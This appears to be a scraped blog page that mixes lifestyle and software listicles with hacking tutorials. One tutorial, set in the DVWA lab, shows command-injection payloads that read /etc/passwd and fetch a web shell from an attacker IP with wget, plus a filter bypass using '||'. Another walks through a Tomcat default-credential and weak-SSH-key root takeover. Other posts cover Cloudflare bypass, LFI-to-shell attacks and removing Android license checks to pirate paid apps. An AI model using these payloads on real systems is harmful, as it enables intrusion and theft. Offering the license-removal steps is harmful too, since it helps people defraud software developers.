5 Geeky Items You Own That Burglars Want

You might not realize it, but there's a particular type of burglar who specializes in pillaging your treasured geek artifacts. While you may be perfectly content to display your prized 1970s-era miniature TARDIS collectibles openly in your living room, you could be putting them in real danger by doing so. Here are five types of items that are coveted by geeks and thieves alike.

1. Action Figures

Image via Flickr by JD Hancock

Although some of your friends may poke fun at you for your prized action figure collection, you know just how much these "dolls" are really worth. Since your vintage in-box Chewbacca or Boba Fett figures are worth a pretty penny, it'd be smart to put them somewhere secure while you're away.

With the prices for sought-after action figure collectables ranging anywhere from $500 to $200,000 for the 1963 G.I. Joe Prototype, stealing one of these guys would make a burglar's day. It definitely happens, too; just last year, a collection of 80 classic Star Wars figures (worth approximately $30,000) was stolen from a home in England.

2. Stamp Collections

Image via Flickr by Itchys

If you own a book of stamps, it might be a good idea to throw them in a frakking safe. Those little sticky pieces of paper can be worth thousands, even millions. One might mistakenly assume their collection is at no risk, but they would be gravely mistaken. Take, for example, this true story of a deceased man's million-dollar stamps: In 2007, the family of Edwin Cherry discovered that their packed moving truck had been broken into. Cherry's life-long collection was gone forever, and the family was deprived of millions in inheritance.

3. Comic Books

Image via Flickr by ...love Maegan

Although much of the non-geek mainstream dismisses comic book collecting as a nerdy pastime, it's a no-brainer that these little paper booklets can be worth a veritable fortune. As you're probably already aware, some of those vintage Batman and Superman books can be worth more than $5,000 a piece (just as an example). Without a doubt, your beloved comic collection is at risk; take it from Nicholas Cage, who had his 2 million dollar comic book stolen in 2000.

If you have a collection of sought-after comics, you probably don't need a copy of Wizard to know how much they're worth. Many high-end collectors have been know to turn to quality security systems like those found at tophomealarms.com so they can rest easy.

4. Coin Collections

Image via Flickr by dichoheco

Would you believe that there's a coin worth over 4 million dollars? Yep, it's true. The 1913 Liberty Head V Nickel, in good condition, could net its owner almost five million big ones. With only five of these coins in the world, it'd take an "only in the movies" kind of heist to nab one. There are hundreds of other extremely rare coins worth anywhere from 200 to 500,000 dollars. Coin collectors, you better keep your silver and gold close.

5. Customized Computers

Image via Flickr by JD Hancock

You haven’t lived until you’ve built your own custom desktop. High powered processors, copious amounts of RAM and the best damn graphics card money can buy. Those who build their own computers will generally spare no expense on creating their own personalized masterpiece. After all, it’s where we likely spend most of our time doing..ahem..very important things. All that time and money spent means that burglars are on the lookout for these machines that can go for a pretty penny on the streets. Even worse, a more knowledgeable thief can use these powerful machines to get personal information about you or commit crimes online, making them that much more sought after.

Even if you weren't aware of their full value, it's a pretty safe bet that you've been collecting these things for year. Don't get caught with your pants down -- take the necessary steps to secure and, if necessary, even insure these valuable collectibles

---

About The Author:

Jake Fisher is a culture geek from Tampa, FL. He loves to write about tech, DIY, culture and anything geek related. He suggests tophomealarms.com to protect your precious geeky items! Follow him @jakemfisher

Read More

C0mmand Executi0n Tut0rial - DVWA Low & Medium Lever

************THIS TUTORIAL IS FOR EDUCATIONAL PURPOSE ONLY*************

Hello guys,
Today I'll be showing you how to exploit command execution vulnerabilities. I will perform this attack on DVWA (Damn Vulnerable Web App) It can be downloaded and installed easily. But for those who are following my tutorials, installing Metasploitable-Linux is enough, because it's installed in it; just open the IP in your browser and click on DVWA.
The default username and password for it are:
User: admin
Password: password

Command execution can be the most dangerous venerability you can find in a website/server. It will allow you to simply backconnect with netcat, or upload your shell in a matter of seconds!
Command execution will allow you to execute commands on the target server whether it's Windows or Linux.

So lets start exploiting!

Lets start with the Low level in DVWA.

The source is:

<?php

if( isset( $_POST[ 'submit' ] ) ) {

$target = $_REQUEST[ 'ip' ];

// Determine OS and execute the ping command.
if (stristr(php_uname('s'), 'Windows NT')) {

$cmd = shell_exec( 'ping ' . $target );
echo '<pre>'.$cmd.'</pre>';

} else {

$cmd = shell_exec( 'ping -c 3 ' . $target );
echo '<pre>'.$cmd.'</pre>';

}

}
?>

As you can see in the code above, it didn't run anything to check if your input is an IP, or if it has '&&' '||' or ';', and those characters means AND, OR, and the sumicolon means the end of a command.
So lets try to run something like:

google.com && ls

The output will be like the image bellow:

Note that a list of files were printed after the ping result. That's what the command "ls" do! So it's working, now lets have more fun!

Execute this command:

google.com && uname -a && id && cat /etc/passwd

Well, it's time to own the system now! The commands are executing with no errors. Lets try to get a shell on their system; for that we need a shell in .txt on a different server. I have a shell on my localhost, so lets use that:

All you have to do is run wget to get the shell, then change the name from SecurityGeeks.txt to SecurityGeeks.php
this command will do it all:

google.com && wget YOUR_IP_ADDRESS/SecurityGeeks.txt && mv SecurityGeeks.txt SecurityGeeks.php

wget will get the shell, mv will change the name. You can get your IP address by running "ipconfig" in windows CMD or "ifconfig" in linux terminal.

So lets try!

Command ran successfully, lets check if our shell is there!

The shell will be in the same directory you're in, so just add /YourShellName.php to the link!

Nice! Now you have full, and easier to use shell access! and Also you get root access if you followed my Metasploit tutorials you'll know how!

OK! now we got the low lever, lets switch to the medium level in DVWA and try to get the same access we got now!

In medium level, they added a little bit of security to the code, but its not enough.
The code in medium is:

<?php

if( isset( $_POST[ 'submit'] ) ) {

$target = $_REQUEST[ 'ip' ];

// Remove any of the charactars in the array (blacklist).
$substitutions = array(
'&&' => '',
';' => '',
);

$target = str_replace( array_keys( $substitutions ), $substitutions, $target );

// Determine OS and execute the ping command.
if (stristr(php_uname('s'), 'Windows NT')) {

$cmd = shell_exec( 'ping ' . $target );
echo '<pre>'.$cmd.'</pre>';

} else {

$cmd = shell_exec( 'ping -c 3 ' . $target );
echo '<pre>'.$cmd.'</pre>';

}
}

?>

As you can see in the code above, they banned the characters ';' and '&&' but it's not really enough because we have another option which is '||'

But it's a little different with this one, because it means OR. So the shell doesn't always execute it when there is another command before it. So the way to use this one will be different than before, we wont add "google.com" then '&& COMMAND' but we will put '|| COMMAND' without anything before it!

Let's just give it a try and see if it's working!

the command 'ls' is working, everything is going fine!
But now, you'll need to use one ONLY command each time.

Hope you enjoyed it!

Read More

Top 10 Easy And Powerful Website Building Software

People, who do not have any technical knowledge, can take advantage of the website building
tools. These tools can be of great help when you want to get your work done. All of the people
who are students, workers, designers, developers, artists, supervisor or homemakers etc. can
use these tools as they are simple and highly advantageous. Most of the tools are not popular
but the features they offer are amazing.

Today everybody searches the internet for his or her queries. This has made the necessary of
the every business to have an online presence. Building a website is considered a tough job but
not now with the help of these top ten powerful and easy website building software’s.

1. Icono Sites

This tool is easy and free to create websites. It will just take a few minutes with the building
option on the website. You can choose the website designs of your choice from a bouquet of
beautiful layouts.

2. Google sites

This is the simplest but powerful tool to build up sites. This tool offers you with the different
choices of the pre-built templates. You can also access and share information with other
administration.

3. Tripod

This tool is powered by Zeeblio which enables the drag and drop abilities. It offers 200
templates from which you can choose your design. This tool is best for eCommerce sites.

4. Doomby

You can easily create your websites easily with this tool without paying any money. This tool
also offers powerful and effective back end. It also offers you with the correct website statistics.

5. Ucoz

This is the first choice of millions of website users. It provides you with 22 modules and 250
templates. This tool is best for the people having a limited budget.

6. Webnode

This tool allows its users to develop, run, design and create free web applications and websites
from beginning to end. This tool can produce high quality professional pages.

7. Snap pages

You can create free and your own personal website with this tool. You can also share your
images, blogs and other stuff with friends and family. The tool is simple and easy to use. For
professional site design, you can subscribe to the premium version.

8. Webriq

This tool is free and you can optimize your site with your mobile browser. It has both the free
and premium version.

9. 350

Those who do not have any knowledge about the languages of computer are highly benefitted
with this tool. You can try the demo version and then subscribe to the premium version.

10. Weebly

With the help of this tool, you will get the simplest way to create a website. This tool enables
the users to spend most of the time on content, which is its best feature.

Try all these tools which and their different features. Web sites are the great mediums by which
you can attract lots of customers and showcase your products and services and these tools will
help you getting your target.

---

About The Author: Claudia is a blogger and she has written various articles on Hadoop Online Training and other training programs. She is also an author of many books, follow me @ITdominus1.

Read More

How To Bypass vBulletin Forums Cloudflare - New Method

Hello guys,
Another video tutorial by Foloox on how to bypass cloudflare. New cool methods that I've never used. :)
The tutorial is on his channel, please subscribe to his channel!

The script used in the second method can be found here:
http://pastie.securitygeeks.net/47



The video is AVAILABLE in HD, just change the quality!Enjoy! ^_^

Read More

How To Remove The License Verification From Android App/Games Using Lucky Patcher

Hello guys, Today I'm going to show you how to remove the license verification from apps and games. License Verification can be found in all paid apps, to check if you actually bought the app/game or downloaded it from somewhere else. Well, today we will remove that license verification and use paid apps for free, or most of them.

For this tutorial we will be using AfterMath XHD, which is a paid game on Google Play, as a demo.

For this tutorial we need:

• Rooted Android Device
• Lucky Patcher (Can Be Downloaded here)
• A Paid game to try to remove the License Verification from it

So, before I remove the license from the game, the game doesn't start because our license is invalid
As you can see in the picture bellow:

Now launch Lucky Patcher, it WILL need root permissions so let it grant the root permissions. When it opens it shows the list of all the apps with Google Ads, License Verification, and some more. (You can see my tutorial about remove Google ads from apps HERE)

Click on the app or the game you want to patch, a screen with some information about the game will show, like the picture bellow:

Click on "Open Menu Of Patches" in the bottom of the page:

Click on "Remove License Verification" a list of patches will show

The patch you chose will be already selected for you, so just click on Apply, it will start processing

Now all you have to do is wait until it finishes and give you the result:

You're done! Now launch the app you patched, and it will work just fine!

This process can patch many apps, including famous ones like SPB Shell 3D! And the game above is one of top paid games in Google Store too.
Have fun, and try patching the apps you want!
Enjoy!

Read More

Local File Inclusion To Php Shell - LFI Tutorial

Hello guys,
Today I have another tutorial Submitted by Foloox Csl. It's a simple LFI Tutorial, to upload a shell using LFI Vulnerability

Enjoy! And please subscribe to him.




Best Watched in HD!

Read More

Attacking Metasploitable - Apache Tomcat - Metasploit Tutorial

Hello guys,
Here's my second Metasploitable-Attacking video. Today we will exploit Apache Tomcat in Metasploitable use Metasploit of course.

Attack description:

1. We did a full nmap port scan, and I detected tomcat installed in the server on port 8180
2. Search for tomcat in Metasploit console "msfconsole" command to find any kind of auxiliary, and or an exploit available for it
3. We found a good exploit which allows command execution, but it needed the USERNAME and PASSWORD of the target server
4. I executed an auxiliary that tried the default tomcat Login details on the target server (This is good when the server admin uses bad passwords)
5. We found the login details, That made the code execution exploit possible to use now
6. We execute the code execution exploit, and we get shell access (You can change the payload, but you don't really need to)
7. After we get the shell access, as we search in /root directory, we find /root/.ssh/authorized_keys
8. As I saw in a post by g0tmi1k about the same attack, those keys have weakness (READ MORE HERE)
9. We download "rsa" weak keys to kind of crack the key, the file can be found on exploitdb search "/pentest/exploits/exploitdb/searchsploit" search for the term "OpenSSL"
10. Download, and extract the file, using "grep -lr KEY *.pub" we will find the right one.
11. Connect to the server using the key, (you will find a file in the previous step with NUMBER.pub take the number) then run the command:

ssh -i NUMBER root@IP

And you're done, root access granted ^_^

Video Demo:

Video Available in HD, just change the Quality!

Read More

How to Add Exploits to Metasploit Framework in 3 steps

Hello Guys,
Today We have a Metasploit Tutorial Submitted by Foloox Csl
The video is on his channel, please subscribe to him!

The tutorial is shwoing how to add exploits to Metasploit. Sometimes we find exploits on exploit-db for Metasploit, in order to be able to use those exploits, we have to follow the steps in the video!

The Video IS available in HD, just change the Qualitly!

Read More

Web Programming Series - HTML Tutorial 8

Hello Guys,
Here is the 8th HTML Tutorial in our Web Programming Series.
Hope you like it

Video Available in HD, just change the quality!

Download Link:

http://www.mediafire.com/?yx4yyd398438rfy

Read More

Top 5 Free Anti-Virus Software

The internet is a dangerous place so not only do we need to protect ourselves and our details online, we also need to protect our computers. Anti-Virus software will be your best option; I know most of you will not want to pay for this software, so here is five of the best FREE anti-virus software so you and your computer can stay protected without having to fork out every month or year.

1. Avira

The Avira software is very easy to download and it offers you and your computer protection as soon as you download it. This software will block any viruses, trojans, worms and rootkits. It will also get rid of any adware and will provide a website security rating so you know what websites are safer to visit and what aren’t. You can scan your computer at any time just to check for yourself whether you have any threats or not.

2. AVG

This is one of the most popular anti-virus software. It is another software that is extremely easy to download and very easy to use. Like Avira, it begins protecting your computer straight away. It offers the basic computer protection, including detecting and stopping any threats, viruses and malware. AVG do offer paid protection, but just the simple free version is enough for you and your computer to stay safe when browsing the internet.

3. Avast

Avast is another popular anti-virus software that millions of people have already downloaded. It is a simple download, although you should make sure it is compatible with your computer. The Avast software offers anti-virus and anti-spyware protection. Malware is difficult to detect and it can potentially find information about you by using your browsing history, but Avast will be able to find and stop any threats to you or your computer.

4. ZoneAlarm

ZoneAlarm is a big name when it comes to anti-virus software and there is no reason why it shouldn’t be. It offers a lot for a free version of the software, including anti-virus and anti-spyware protection, an advanced firewall and identity protection. With ZoneAlarm, you and your computer are made invisible to hackers, so you will never need to worry about whether you are in danger. Also, like Avira, ZoneAlarm runs a website safety check to make sure you are not visiting risky sites.

5. Comodo

The Comodo anti-virus software is a reliable software for everyday use. Not only can it detect suspicious files, it can also prevent viruses, malware and spyware and it runs quick scans. There is a paid version of the Comodo anti-virus software, but this is not necessary just for everyday personal use. You and your computer will be safe and protected from online danger with this Comodo software; you will not have to worry about a thing!

If you are looking for a simple anti-virus software that will cover your day-to-day computer activity, then any of the free software above will be perfect for you. They all have products you can pay for,

but there is no need when you are just using your computer for personal things instead of business related tasks.

---

About the Author:

Katie Belliveau loves blogging and she can write about pretty much anything; she
especially loves writing about business. She suggests taking care of your business both online and
offline, which means, install anti-virus software and improve office security.

Read More